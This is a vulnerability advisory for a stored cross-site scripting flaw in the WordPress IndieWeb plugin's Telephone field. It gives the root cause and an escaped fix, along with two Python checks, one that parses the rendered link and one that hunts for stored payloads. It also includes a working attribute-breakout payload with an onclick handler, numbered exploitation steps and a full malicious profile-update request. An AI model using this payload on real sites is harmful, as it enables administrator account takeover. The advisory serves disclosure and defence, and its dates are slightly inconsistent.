WordPress IndieWeb 4.0.5 Cross Site Scripting

10 Apr 2026 00:00:00 | Reported by d3kc4rt1 | Type: packetstorm | Source: packetstorm.news | 80 Views

Stored XSS in the IndieWeb plugin <= 4.0.5 lets authenticated users with the Author role or higher inject JavaScript through the Telephone profile field, which the plugin's h-card widget renders unescaped.

Related

| Reporter | Title | Published | Source |
|---|---|---|---|
| GithubExploit | Exploit for CVE-2025-14893 | 9 Apr 2026 18:11 | githubexploit |
| Circl | CVE-2025-14893 | 9 Jan 2026 08:02 | circl |
| CNNVD | WordPress plugin IndieWeb cross-site scripting vulnerability | 9 Jan 2026 00:00 | cnnvd |
| CVE | CVE-2025-14893 | 9 Jan 2026 06:34 | cve |
| Cvelist | CVE-2025-14893 IndieWeb <= 4.0.5 - Authenticated (Author+) Stored Cross-Site Scripting via 'Telephone' Parameter | 9 Jan 2026 06:34 | cvelist |
| EUVD | EUVD-2026-1800 | 9 Jan 2026 06:34 | euvd |
| NVD | CVE-2025-14893 | 9 Jan 2026 07:16 | nvd |
| Patchstack | WordPress IndieWeb plugin <= 4.0.5 - Authenticated (Author+) Stored Cross-Site Scripting via 'Telephone' Parameter vulnerability | 8 Jan 2026 22:39 | patchstack |
| Positive Technologies | PT-2026-1757 | 9 Jan 2026 00:00 | ptsecurity |
| RedhatCVE | CVE-2025-14893 | 13 Jan 2026 22:53 | redhatcve |

Code
# CVE-2025-14893: Authenticated Stored Cross-Site Scripting (XSS) in IndieWeb WordPress Plugin
    
    > **Disclaimer:** This repository is created for **educational purposes and ethical disclosure only**. The vulnerability has been responsibly reported to the vendor and patched. Do not use this information to exploit systems without proper authorization.
    
    ## Executive Summary
    A **Stored Cross-Site Scripting (XSS)** vulnerability was discovered in the **IndieWeb** plugin for WordPress (versions <= 4.0.5). This vulnerability allows authenticated attackers with **Author** privileges or higher to inject malicious JavaScript into their user profile's "Telephone" field. 
    
    When the "Author Profile H-Card Widget" is displayed on the frontend, the stored value is rendered without escaping. If a highly privileged user, such as an Administrator, clicks the manipulated link, the script executes in their browser context with their session. WordPress sets its authentication cookies HttpOnly by default, so the realistic outcome is not cookie theft but unauthorized administrative actions performed with the Administrator's session, up to complete Account Takeover (ATO).
    
    ## Vulnerability Overview
    * **CVE ID:** CVE-2025-14893
    * **Product:** IndieWeb (WordPress Plugin)
    * **Affected Versions:** `<= 4.0.5`
    * **Vulnerability Type:** Stored Cross-Site Scripting (XSS) (CWE-79)
    * **Required Privileges:** Authenticated (Author-level and above)
    
    ## Technical Deep Dive & Root Cause
    The root cause is a missing output-escaping step in the plugin's h-card template: user-controlled profile metadata is echoed straight into HTML without WordPress's built-in escaping functions.
    
    **Vulnerable File:** `templates/h-card.php` (Line 27)
    
    ```php
    <a class="p-tel tel" href="tel:<?php echo $user->get( 'tel' ); ?>"><?php echo $user->get( 'tel' ); ?></a>
    ```
    
    **The Flaw:** 
    The plugin outputs the user's `tel` metadata inside the `href` attribute with a bare `echo`, without `esc_attr()`. A value containing a double quote (`"`) therefore closes the `href` attribute early, and whatever follows is parsed as further attributes of the `<a>` element (for example `style` or an `onclick` handler). The same value is echoed a second time as the link text, also without `esc_html()`. WordPress's usual input sanitizer, `sanitize_text_field()`, strips HTML tags but leaves double quotes intact, so sanitizing on save does not prevent this attribute breakout; the fix has to be escaping for the output context.
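As an added example (not code from the plugin or this advisory), the script below renders the single `<a>` line above both unescaped and escaped and feeds each result to Python's HTML parser, which assigns attributes the way a browser would. It assumes `html.escape(..., quote=True)` as a stand-in for `esc_attr()`/`esc_html()` (all of them encode `&`, `<`, `>`, `"` and `'`) and reuses the payload from the PoC section.

```python
"""Render the h-card 'tel' link the vulnerable way and the patched way, then
parse both with a real HTML parser to see which attributes a browser would
assign to the anchor.

Added example, not the IndieWeb plugin's own code. Assumptions: Python's
html.escape(..., quote=True) stands in for WordPress esc_attr()/esc_html(),
and the template is reduced to the single <a> tag from templates/h-card.php."""
from html import escape
from html.parser import HTMLParser

# Payload from the PoC: closes href="...", then adds style and onclick.
PAYLOAD = ('Click_Me" style="background:#ff4444; color:white; padding:5px; '
           'display:inline-block;" onclick="alert(document.cookie);')


def render_vulnerable(tel: str) -> str:
    """Mirror of the vulnerable line: raw echo in attribute and text context."""
    return f'<a class="p-tel tel" href="tel:{tel}">{tel}</a>'


def render_patched(tel: str) -> str:
    """Escaped in both contexts, as the remediation section shows."""
    attr = escape(tel, quote=True)   # esc_attr() equivalent
    text = escape(tel, quote=True)   # esc_html() equivalent (also encodes quotes)
    return f'<a class="p-tel tel" href="tel:{attr}">{text}</a>'


class _FirstAnchor(HTMLParser):
    """Collect the attributes the parser assigns to the first <a> it sees."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs = None
        self.text = ""

    def handle_starttag(self, tag, attrs):
        if tag == "a" and self.attrs is None:
            self.attrs = dict(attrs)

    def handle_data(self, data):
        self.text += data


def anchor_attributes(html: str) -> dict:
    """Attributes the browser would set on the rendered anchor."""
    parser = _FirstAnchor()
    parser.feed(html)
    parser.close()
    return parser.attrs or {}


def event_handlers(html: str) -> list:
    """Names of on* handlers wired onto the anchor: non-empty means XSS."""
    return sorted(k for k in anchor_attributes(html) if k.startswith("on"))


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("patched", render_patched)):
        out = render(PAYLOAD)
        print(f"{name}: attrs={sorted(anchor_attributes(out))} handlers={event_handlers(out)}")
```

In the vulnerable render the parser hands the anchor a `style` and an `onclick` attribute and a truncated `href` of `tel:Click_Me`; in the patched render the anchor has only `class` and `href`, and the whole payload, quotes included, ends up as the phone number inside the `href` value.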
    
    ## Business Impact
    * **Account Takeover (ATO):** If an Administrator interacts with the manipulated element, the attacker's JavaScript runs in the Administrator's session. Because WordPress authentication cookies are HttpOnly, the PoC's `document.cookie` only proves execution; a real payload would instead drive `wp-admin` or the REST API with the victim's session (creating an administrator account, for instance), granting the attacker full control over the WordPress site.
    * **Reputation Damage:** The attacker can modify the visible elements of the page (defacement) or redirect legitimate visitors to malicious third-party websites.
    
    ## Proof of Concept (PoC)
    
    ### Prerequisites
    1. WordPress installed with IndieWeb `<= 4.0.5` activated.
    2. An attacker account with the **Author** role.
    3. The "Author Profile H-Card Widget" added to a visible frontend area (e.g., Sidebar).
    
    ### Exploitation Steps
    1. Log in to the WordPress dashboard as the **Author**.
    2. Navigate to **Profile** (`/wp-admin/profile.php`).
    3. Scroll down to the **Telephone** field.
    4. Inject the following payload into it. The leading `"` closes the `href` attribute, and the attribute's original closing quote terminates the injected `onclick` value:
       ```text
       Click_Me" style="background:#ff4444; color:white; padding:5px; display:inline-block;" onclick="alert(document.cookie);
       ```
    5. Click **Update Profile**.
    6. **Crucial Step:** Create and publish a new Post. The vulnerable widget only renders on single post pages (`is_single()`) to display the author's information.
    7. **Trigger:** When an Administrator visits the published post on the frontend and clicks the newly styled "Click_Me" telephone button, the XSS payload executes (here `alert(document.cookie)`, which on a default install will not show the HttpOnly auth cookies but proves script execution in the Administrator's session).
    
    ### Example Malicious HTTP Request (Profile Update)
    ```http
    POST /wp-admin/profile.php HTTP/1.1
    Host: TARGET
    Content-Type: application/x-www-form-urlencoded
    Cookie: [Author_Session_Cookies]
    
    _wpnonce=[valid_nonce]&_wp_http_referer=%2Fwp-admin%2Fprofile.php&from=profile&checkuser_id=2&color-nonce=[nonce]&admin_color=fresh&admin_bar_front=1&first_name=&last_name=&nickname=attacker&display_name=attacker&email=attacker%40example.com&tel=Click_Me"%20style%3D"background%3A%23ff4444%3B%20color%3Awhite%3B%20padding%3A5px%3B%20display%3Ainline-block%3B"%20onclick%3D"alert(document.cookie)%3B&action=update&user_id=2&submit=Update+Profile
    ```
    
    ## Remediation
    To patch this vulnerability, the plugin developers must escape the value for each output context: `esc_attr()` for the `href` attribute and `esc_html()` for the link text. Both encode `&`, `<`, `>`, `"` and `'`, so the payload's quote becomes `&quot;` and can no longer close the attribute.
    
    **Patched Code Example:**
    ```php
    <a class="p-tel tel" href="tel:<?php echo esc_attr( $user->get( 'tel' ) ); ?>"><?php echo esc_html( $user->get( 'tel' ) ); ?></a>
    ```
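Patching stops new injections but does not remove values that were stored before the update. The following added example (not the plugin's code) hunts for stored breakout payloads in the `tel` field and shows the allowlist a hardened save hook could enforce. It assumes the field lives in `wp_usermeta` under `meta_key = 'tel'` (the key read by `$user->get( 'tel' )`) and a default `wp_` table prefix; the sample rows are constructed.

```python
"""Hunt for stored breakout payloads in the IndieWeb 'tel' profile field and
show the allowlist a hardened save hook could enforce.

Added example, not the plugin's code. Assumptions: the field is stored in
wp_usermeta under meta_key 'tel' (the key read by $user->get('tel')), and the
rows below are constructed to resemble that table."""
import re

# Constructed rows: (umeta_id, user_id, meta_key, meta_value).
SAMPLE_USERMETA = [
    (101, 1, "tel", "+1 555 0100"),
    (102, 2, "tel", 'Click_Me" style="color:red" onclick="alert(document.cookie);'),
    (103, 3, "tel", "+44 (0)20 7946 0000"),
    (104, 4, "tel", "555-0101 ext. 12"),
    (105, 5, "tel", "<b>call me</b>"),
    (106, 2, "description", 'quotes "here" are fine, this is not the tel field'),
]

# Characters that matter in the two output contexts of h-card.php:
# '"' closes the double-quoted href attribute, '<' and '>' open/close tags in
# the text node. A single quote cannot break out of a double-quoted attribute,
# so it is deliberately not flagged.
BREAKOUT_CHARS = re.compile(r'["<>]')
EVENT_ATTR = re.compile(r'\bon[a-z]+\s*=', re.IGNORECASE)

# Conservative allowlist for a phone number: digits, +, separators, "ext".
PHONE_ALLOWLIST = re.compile(r'^[0-9+\-().\s]+(?:ext\.?\s*[0-9]+)?$', re.IGNORECASE)


def is_plausible_phone(value: str) -> bool:
    """Allowlist check a save hook could apply before update_user_meta()."""
    return bool(PHONE_ALLOWLIST.match(value.strip()))


def suspicious_tel_rows(rows):
    """Return (user_id, meta_value, reasons) for tel values that could exploit
    the unescaped template. Reasons, in order: breakout characters, an inline
    event handler, and an allowlist miss (the weakest signal, but worth a look)."""
    findings = []
    for _umeta_id, user_id, key, value in rows:
        if key != "tel":
            continue
        reasons = []
        if BREAKOUT_CHARS.search(value):
            reasons.append("breakout-chars")
        if EVENT_ATTR.search(value):
            reasons.append("event-handler")
        if not is_plausible_phone(value):
            reasons.append("not-a-phone-number")
        if reasons:
            findings.append((user_id, value, reasons))
    return findings


# The same hunt as SQL against the live database (assumed 'wp_' prefix):
#   SELECT user_id, meta_value FROM wp_usermeta
#   WHERE meta_key = 'tel'
#     AND (meta_value LIKE '%"%' OR meta_value LIKE '%<%' OR meta_value LIKE '%>%');

if __name__ == "__main__":
    for user_id, value, reasons in suspicious_tel_rows(SAMPLE_USERMETA):
        print(f"user {user_id}: {reasons}: {value!r}")
```

Any hit is a user whose profile should be cleaned and whose account history (login source, posts published since the value was set) deserves a look, since publishing a post is the step that exposes the widget.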
    
    ## Timeline
    
    * 2026-03-03: Reported to Wordfence.
    * 2026-03-20: Vulnerability patched / public disclosure.
    
    ## References & Credits
    
    * [Wordfence Vulnerability Database](https://www.wordfence.com/threat-intel/vulnerabilities/id/b29f0fea-a2db-4b2e-b7b8-d15b2395e9e6)
    * [CVE-2025-14893 on CVE.org](https://www.cve.org/CVERecord?id=CVE-2025-14893)
    * [IndieWeb Plugin on WordPress.org](https://wordpress.org/plugins/indieweb/)

Scores (current as of 10 Apr 2026 00:00):

* Vulners AI Score: 5.2 (Medium risk)
* CVSS 3.1: 6.4
* EPSS: 0.00205
* Views: 80